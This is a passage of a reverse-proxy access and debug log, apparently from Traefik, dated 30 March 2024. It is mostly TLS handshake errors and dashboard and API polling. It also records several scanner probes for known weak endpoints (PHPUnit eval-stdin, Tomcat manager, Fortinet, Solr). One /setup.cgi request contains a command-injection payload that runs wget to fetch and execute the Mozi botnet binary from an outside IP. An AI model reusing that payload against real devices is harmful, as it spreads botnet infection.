([http/0.9 http/1.0 spdy/1 spdy/2 spdy/3 h2c hq])" +time="2024-03-30T10:12:15Z" level=debug msg="http: TLS handshake error from 10.0.0.4:55999: tls: client requested unsupported application protocols ([hq h2c spdy/3 spdy/2 spdy/1 http/1.0 http/0.9])" +time="2024-03-30T10:12:17Z" level=debug msg="http: TLS handshake error from 10.2.1.1:63299: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T10:12:18Z" level=debug msg="Serving default certificate for request: \"172-233-169-13.ip.linodeusercontent.com\"" +time="2024-03-30T10:12:18Z" level=debug msg="http: TLS handshake error from 10.2.0.129:39582: read tcp 10.2.0.36:8080->10.2.0.129:39582: read: connection reset by peer" +time="2024-03-30T10:12:19Z" level=debug msg="Serving default certificate for request: \"172-233-169-13.ip.linodeusercontent.com\"" +time="2024-03-30T10:12:20Z" level=debug msg="http: TLS handshake error from 10.0.0.4:61273: EOF" +time="2024-03-30T10:12:20Z" level=debug msg="Serving default certificate for request: \"172-233-169-13.ip.linodeusercontent.com\"" +time="2024-03-30T10:12:21Z" level=debug msg="http: TLS handshake error from 10.2.1.1:29053: EOF" +time="2024-03-30T10:12:22Z" level=debug msg="Serving default certificate for request: \"172-233-169-13.ip.linodeusercontent.com\"" +time="2024-03-30T10:12:22Z" level=debug msg="http: TLS handshake error from 10.2.0.129:52502: read tcp 10.2.0.36:8080->10.2.0.129:52502: read: connection reset by peer" +time="2024-03-30T10:12:57Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T10:12:58Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T10:13:00Z" level=debug msg="http: TLS handshake error from 10.0.0.4:16689: tls: client offered only unsupported versions: [302]" +time="2024-03-30T10:13:32Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:10:13:33 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 964 "-" "-" 0ms +time="2024-03-30T10:13:52Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:10:13:53 +0000] "GET /favicon.ico HTTP/1.1" 404 19 "-" "-" 965 "-" "-" 0ms +time="2024-03-30T10:13:54Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:10:13:55 +0000] "GET /robots.txt HTTP/1.1" 404 19 "-" "-" 966 "-" "-" 0ms +time="2024-03-30T10:13:56Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:10:13:57 +0000] "GET /sitemap.xml HTTP/1.1" 404 19 "-" "-" 967 "-" "-" 0ms +time="2024-03-30T10:13:58Z" level=debug msg="Serving default certificate for request: \"172-233-168-9.ip.linodeusercontent.com\"" +time="2024-03-30T10:13:59Z" level=debug msg="http: TLS handshake error from 10.2.0.129:22237: EOF" +time="2024-03-30T10:13:59Z" level=debug msg="Serving default certificate for request: \"172-233-168-9.ip.linodeusercontent.com\"" +time="2024-03-30T10:14:00Z" level=debug msg="http: TLS handshake error from 10.0.0.4:62559: EOF" +time="2024-03-30T10:14:01Z" level=debug msg="Serving default certificate for request: \"172-233-168-9.ip.linodeusercontent.com\"" +time="2024-03-30T10:14:01Z" level=debug msg="http: TLS handshake error from 10.2.1.1:16939: tls: no cipher suite supported by both client and server" +time="2024-03-30T10:14:01Z" level=debug msg="http: TLS handshake error from 10.2.0.129:37274: tls: client requested unsupported application protocols ([http/0.9 http/1.0 spdy/1 spdy/2 spdy/3 h2c hq])" +time="2024-03-30T10:14:02Z" level=debug msg="http: TLS handshake error from 10.0.0.4:3136: tls: client requested unsupported application protocols ([hq h2c spdy/3 spdy/2 spdy/1 http/1.0 http/0.9])" +time="2024-03-30T10:14:04Z" level=debug msg="http: TLS handshake error from 10.2.1.1:16875: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T10:14:06Z" level=debug msg="Serving default certificate for request: \"172-233-168-9.ip.linodeusercontent.com\"" +time="2024-03-30T10:14:06Z" level=debug msg="http: TLS handshake error from 10.2.0.129:11637: read tcp 10.2.0.36:80->10.2.0.129:11637: read: connection reset by peer" +time="2024-03-30T10:14:07Z" level=debug msg="Serving default certificate for request: \"172-233-168-9.ip.linodeusercontent.com\"" +time="2024-03-30T10:14:09Z" level=debug msg="http: TLS handshake error from 10.0.0.4:16156: EOF" +time="2024-03-30T10:14:10Z" level=debug msg="Serving default certificate for request: \"172-233-168-9.ip.linodeusercontent.com\"" +time="2024-03-30T10:14:11Z" level=debug msg="http: TLS handshake error from 10.2.1.1:54380: EOF" +time="2024-03-30T10:14:12Z" level=debug msg="Serving default certificate for request: \"172-233-168-9.ip.linodeusercontent.com\"" +time="2024-03-30T10:14:12Z" level=debug msg="http: TLS handshake error from 10.2.0.129:48786: read tcp 10.2.0.36:80->10.2.0.129:48786: read: connection reset by peer" +10.0.0.4 - - [30/Mar/2024:10:15:35 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 968 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:10:15:39 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 969 "-" "-" 0ms +time="2024-03-30T10:18:41Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T10:24:25Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T10:46:35Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:10:46:35 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 970 "-" "-" 0ms +time="2024-03-30T10:46:36Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:10:46:36 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 971 "-" "-" 0ms +time="2024-03-30T10:47:25Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:10:47:25 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 972 "-" "-" 0ms +time="2024-03-30T10:47:25Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:10:47:26 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 973 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:10:50:21 +0000] "GET / HTTP/1.1" 301 17 "-" "-" 974 "dashboard@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:10:53:35 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 975 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:10:53:35 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 976 "api@internal" "-" 0ms +time="2024-03-30T10:54:05Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T10:54:05Z" level=debug msg="http: TLS handshake error from 10.2.1.1:6607: EOF" +time="2024-03-30T10:54:05Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T10:54:05Z" level=debug msg="http: TLS handshake error from 10.2.0.129:32123: EOF" +time="2024-03-30T10:54:05Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T10:54:05Z" level=debug msg="http: TLS handshake error from 10.0.0.4:42501: tls: no cipher suite supported by both client and server" +time="2024-03-30T10:54:05Z" level=debug msg="http: TLS handshake error from 10.2.1.1:62191: tls: client requested unsupported application protocols ([http/0.9 http/1.0 spdy/1 spdy/2 spdy/3 h2c hq])" +time="2024-03-30T10:54:05Z" level=debug msg="http: TLS handshake error from 10.2.0.129:61721: tls: client requested unsupported application protocols ([hq h2c spdy/3 spdy/2 spdy/1 http/1.0 http/0.9])" +time="2024-03-30T10:54:05Z" level=debug msg="http: TLS handshake error from 10.0.0.4:7507: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T10:54:05Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T10:54:05Z" level=debug msg="http: TLS handshake error from 10.2.1.1:31979: read tcp 10.2.0.36:80->10.2.1.1:31979: read: connection reset by peer" +time="2024-03-30T10:54:05Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T10:54:05Z" level=debug msg="http: TLS handshake error from 10.2.0.129:30023: EOF" +time="2024-03-30T10:54:05Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T10:54:05Z" level=debug msg="http: TLS handshake error from 10.0.0.4:8747: EOF" +time="2024-03-30T10:54:06Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T10:54:06Z" level=debug msg="http: TLS handshake error from 10.2.1.1:57612: read tcp 10.2.0.36:80->10.2.1.1:57612: read: connection reset by peer" +10.2.1.1 - - [30/Mar/2024:10:54:39 +0000] "GET / HTTP/1.0" 200 1163 "-" "-" 977 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:10:56:06 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 978 "-" "-" 0ms +time="2024-03-30T11:05:59Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:11:05:59 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 979 "-" "-" 0ms +time="2024-03-30T11:06:03Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:11:06:03 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 980 "-" "-" 0ms +time="2024-03-30T11:06:20Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:11:06:21 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 981 "-" "-" 0ms +time="2024-03-30T11:06:22Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:11:06:22 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 982 "-" "-" 0ms +time="2024-03-30T11:12:02Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:11:12:02 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 983 "-" "-" 0ms +time="2024-03-30T11:12:02Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:11:12:03 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 984 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:11:26:12 +0000] "GET / HTTP/1.1" 301 17 "-" "-" 985 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:11:26:15 +0000] "GET / HTTP/1.1" 301 17 "-" "-" 986 "dashboard@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:11:26:19 +0000] "GET /dashboard HTTP/1.1" 200 1163 "-" "-" 987 "dashboard@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:11:26:19 +0000] "GET /app-logo-128x128.png HTTP/1.1" 200 18503 "-" "-" 988 "dashboard@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:11:26:19 +0000] "GET /icons/favicon-16x16.png HTTP/1.1" 200 468 "-" "-" 989 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:11:26:23 +0000] "GET /icons/favicon-32x32.png HTTP/1.1" 200 1300 "-" "-" 990 "dashboard@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:11:26:23 +0000] "GET /icons/favicon-96x96.png HTTP/1.1" 200 4714 "-" "-" 991 "dashboard@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:11:26:25 +0000] "GET /icons/favicon.ico HTTP/1.1" 200 10134 "-" "-" 992 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:11:26:26 +0000] "GET /icons/apple-icon-152x152.png HTTP/1.1" 200 22642 "-" "-" 993 "dashboard@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:11:27:18 +0000] "CONNECT - HTTP/1.1" 404 19 "-" "-" 994 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:11:33:25 +0000] "GET / HTTP/1.1" 301 17 "-" "-" 995 "dashboard@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:11:34:52 +0000] "GET / HTTP/1.1" 301 17 "-" "-" 996 "dashboard@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:11:41:07 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 997 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:11:41:07 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 998 "api@internal" "-" 0ms +time="2024-03-30T11:43:19Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:11:43:19 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 999 "-" "-" 0ms +time="2024-03-30T11:43:20Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:11:43:20 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1000 "-" "-" 0ms +time="2024-03-30T11:44:47Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:11:44:47 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1001 "-" "-" 0ms +time="2024-03-30T11:44:49Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:11:44:49 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1002 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:11:46:24 +0000] "GET /manager/html HTTP/1.1" 404 19 "-" "-" 1003 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:11:47:01 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1004 "-" "-" 0ms +time="2024-03-30T11:48:27Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T11:48:27Z" level=debug msg="http: TLS handshake error from 10.0.0.4:4634: read tcp 10.2.0.36:80->10.0.0.4:4634: read: connection reset by peer" +10.2.1.1 - - [30/Mar/2024:11:48:40 +0000] "CONNECT - HTTP/1.1" 404 19 "-" "-" 1005 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:11:52:04 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1006 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:11:52:04 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1007 "api@internal" "-" 0ms +time="2024-03-30T11:54:02Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:11:54:03 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1008 "-" "-" 0ms +time="2024-03-30T11:54:03Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:11:54:03 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1009 "-" "-" 0ms +time="2024-03-30T11:54:09Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:11:54:09 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1010 "-" "-" 0ms +time="2024-03-30T11:54:10Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:11:54:10 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1011 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:11:56:05 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1012 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:11:58:10 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*&wget+http://102.33.46.49:51643/Mozi.m+-O+/tmp/netgear&sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 19 "-" "-" 1013 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:12:00:44 +0000] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 19 "-" "-" 1014 "-" "-" 0ms +time="2024-03-30T12:02:16Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:12:02:17 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1015 "-" "-" 0ms +time="2024-03-30T12:02:18Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:12:02:22 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1016 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:12:02:27 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1017 "-" "-" 0ms +time="2024-03-30T12:04:42Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:12:04:42 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1018 "-" "-" 0ms +time="2024-03-30T12:04:43Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:12:04:43 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1019 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:12:08:46 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "-" 1020 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:12:09:16 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1021 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:12:09:16 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1022 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:12:10:14 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1023 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:12:10:14 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1024 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:12:16:20 +0000] "CONNECT - HTTP/1.1" 404 19 "-" "-" 1025 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:12:16:46 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 19 "-" "-" 1026 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:12:20:21 +0000] "CONNECT - HTTP/1.1" 404 19 "-" "-" 1027 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:12:24:01 +0000] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 19 "-" "-" 1028 "-" "-" 0ms +time="2024-03-30T12:25:40Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:12:25:41 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1029 "-" "-" 0ms +time="2024-03-30T12:25:41Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:12:25:41 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1030 "-" "-" 0ms +time="2024-03-30T12:26:10Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:12:26:11 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1031 "-" "-" 0ms +time="2024-03-30T12:26:11Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:12:26:11 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1032 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:12:26:24 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1033 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:12:26:24 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1034 "api@internal" "-" 0ms +time="2024-03-30T12:28:13Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:12:28:13 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1035 "-" "-" 0ms +time="2024-03-30T12:28:14Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:12:28:14 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1036 "-" "-" 0ms +time="2024-03-30T12:30:20Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:12:30:20 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1037 "-" "-" 0ms +time="2024-03-30T12:30:28Z" level=debug msg="http: TLS handshake error from 10.2.1.1:60944: tls: client offered only unsupported versions: []" +time="2024-03-30T12:30:32Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T12:30:32Z" level=debug msg="http: TLS handshake error from 10.2.0.129:31987: tls: no cipher suite supported by both client and server" +time="2024-03-30T12:30:39Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:12:30:39 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1038 "-" "-" 0ms +time="2024-03-30T12:30:47Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:12:30:47 +0000] "GET /favicon.ico HTTP/1.1" 404 19 "-" "-" 1039 "-" "-" 0ms +time="2024-03-30T12:30:52Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:12:30:53 +0000] "GET /api/v2/static/not.found HTTP/1.1" 404 19 "-" "-" 1040 "-" "-" 0ms +time="2024-03-30T12:30:57Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:12:30:57 +0000] "GET /remote/logincheck HTTP/1.1" 404 19 "-" "-" 1041 "-" "-" 0ms +time="2024-03-30T12:31:00Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:12:31:00 +0000] "GET /fonts/ftnt-icons.woff HTTP/1.1" 404 19 "-" "-" 1042 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:12:37:41 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1043 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:12:42:50 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1044 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:12:42:50 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1045 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:12:43:50 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1046 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:12:43:50 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1047 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:12:44:50 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1048 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:12:44:50 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1049 "api@internal" "-" 0ms +time="2024-03-30T12:45:13Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:12:45:13 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1050 "-" "-" 0ms +time="2024-03-30T12:45:14Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:12:45:14 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1051 "-" "-" 0ms +time="2024-03-30T12:47:18Z" level=debug msg="Serving default certificate for request: \"\"" +time="2024-03-30T12:47:19Z" level=debug msg="http: TLS handshake error from 10.0.0.4:8431: read tcp 10.2.0.36:443->10.0.0.4:8431: read: connection reset by peer" +time="2024-03-30T12:47:51Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T12:47:52Z" level=debug msg="http: TLS handshake error from 10.2.1.1:59211: EOF" +time="2024-03-30T12:47:52Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T12:47:53Z" level=debug msg="http: TLS handshake error from 10.2.0.129:29381: EOF" +time="2024-03-30T12:47:53Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T12:47:53Z" level=debug msg="http: TLS handshake error from 10.0.0.4:7857: tls: no cipher suite supported by both client and server" +time="2024-03-30T12:47:53Z" level=debug msg="http: TLS handshake error from 10.2.1.1:22756: tls: client requested unsupported application protocols ([http/0.9 http/1.0 spdy/1 spdy/2 spdy/3 h2c hq])" +time="2024-03-30T12:47:54Z" level=debug msg="http: TLS handshake error from 10.2.0.129:1536: tls: client requested unsupported application protocols ([hq h2c spdy/3 spdy/2 spdy/1 http/1.0 http/0.9])" +time="2024-03-30T12:47:54Z" level=debug msg="http: TLS handshake error from 10.0.0.4:30948: tls: client offered only unsupported versions: [302 301]" +time="2024-03-30T12:47:55Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T12:47:55Z" level=debug msg="http: TLS handshake error from 10.2.1.1:12062: read tcp 10.2.0.36:443->10.2.1.1:12062: read: connection reset by peer" +time="2024-03-30T12:47:55Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T12:47:56Z" level=debug msg="http: TLS handshake error from 10.2.0.129:54650: EOF" +time="2024-03-30T12:47:56Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T12:47:57Z" level=debug msg="http: TLS handshake error from 10.0.0.4:31932: EOF" +time="2024-03-30T12:47:57Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +time="2024-03-30T12:47:57Z" level=debug msg="http: TLS handshake error from 10.2.1.1:38082: read tcp 10.2.0.36:443->10.2.1.1:38082: read: connection reset by peer" +10.2.1.1 - - [30/Mar/2024:12:52:45 +0000] "GET / HTTP/1.1" 301 17 "-" "-" 1052 "dashboard@internal" "-" 0ms +time="2024-03-30T12:52:55Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:12:52:56 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1053 "-" "-" 0ms +time="2024-03-30T12:52:57Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:12:52:57 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1054 "-" "-" 0ms +10.0.0.4 - - [30/Mar/2024:12:56:38 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 404 19 "-" "-" 1055 "-" "-" 0ms +time="2024-03-30T12:58:08Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:12:58:08 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1056 "-" "-" 0ms +time="2024-03-30T12:58:09Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.0.129 - - [30/Mar/2024:12:58:09 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1057 "-" "-" 0ms +time="2024-03-30T12:58:16Z" level=debug msg="Serving default certificate for request: \"\"" +10.0.0.4 - - [30/Mar/2024:12:58:16 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1058 "-" "-" 0ms +time="2024-03-30T12:58:16Z" level=debug msg="Serving default certificate for request: \"\"" +10.2.1.1 - - [30/Mar/2024:12:58:17 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1059 "-" "-" 0ms +time="2024-03-30T13:02:28Z" level=debug msg="Serving default certificate for request: \"172.233.168.9\"" +10.2.0.129 - - [30/Mar/2024:13:02:29 +0000] "GET / HTTP/1.1" 404 19 "-" "-" 1060 "-" "-" 0ms +10.2.0.129 - - [30/Mar/2024:13:03:43 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1061 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:13:03:43 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1062 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:13:04:42 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1063 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:13:04:42 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1064 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:13:10:28 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1065 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:13:10:28 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1066 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:13:11:28 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1067 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:13:11:28 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1068 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:13:12:28 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1069 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:13:12:28 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1070 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:13:13:28 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1071 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:13:13:28 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 1072 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:13:14:28 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 1073 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:13:14:28 +0000] "GET /api/overview HTTP/1.1" 200 